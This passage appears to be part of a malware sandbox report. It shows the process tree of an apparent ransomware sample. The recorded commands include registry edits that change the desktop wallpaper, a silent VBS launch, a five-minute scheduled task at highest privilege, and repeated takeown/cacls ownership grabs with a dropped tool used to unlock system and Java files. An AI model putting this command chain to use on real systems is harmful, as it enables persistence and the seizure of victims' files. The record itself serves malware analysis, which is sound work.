  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5w893pya.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5w893pya.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1932
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\t1MWN6ik.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\t1MWN6ik.vbs"
    3⤵
    - Checks computer location settings
    PID:808
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\pmy31InU.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1816
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\pmy31InU.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:756
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:384
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:3204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:392
    - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ64.exe
        
        TaBI95AQ.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:3304
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3464
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:2992
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2304
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3752
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2596
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:420
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:628
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:2892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2440
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3784
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2964
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:3320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3148
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:2304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3752
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1420
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3524
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:3120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:2484
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2448
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3388
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2596
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3120
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1420
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2788
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3108
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3524
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3784
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:1684
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3124
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1892
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2636
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2484
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3936
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:3308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2500
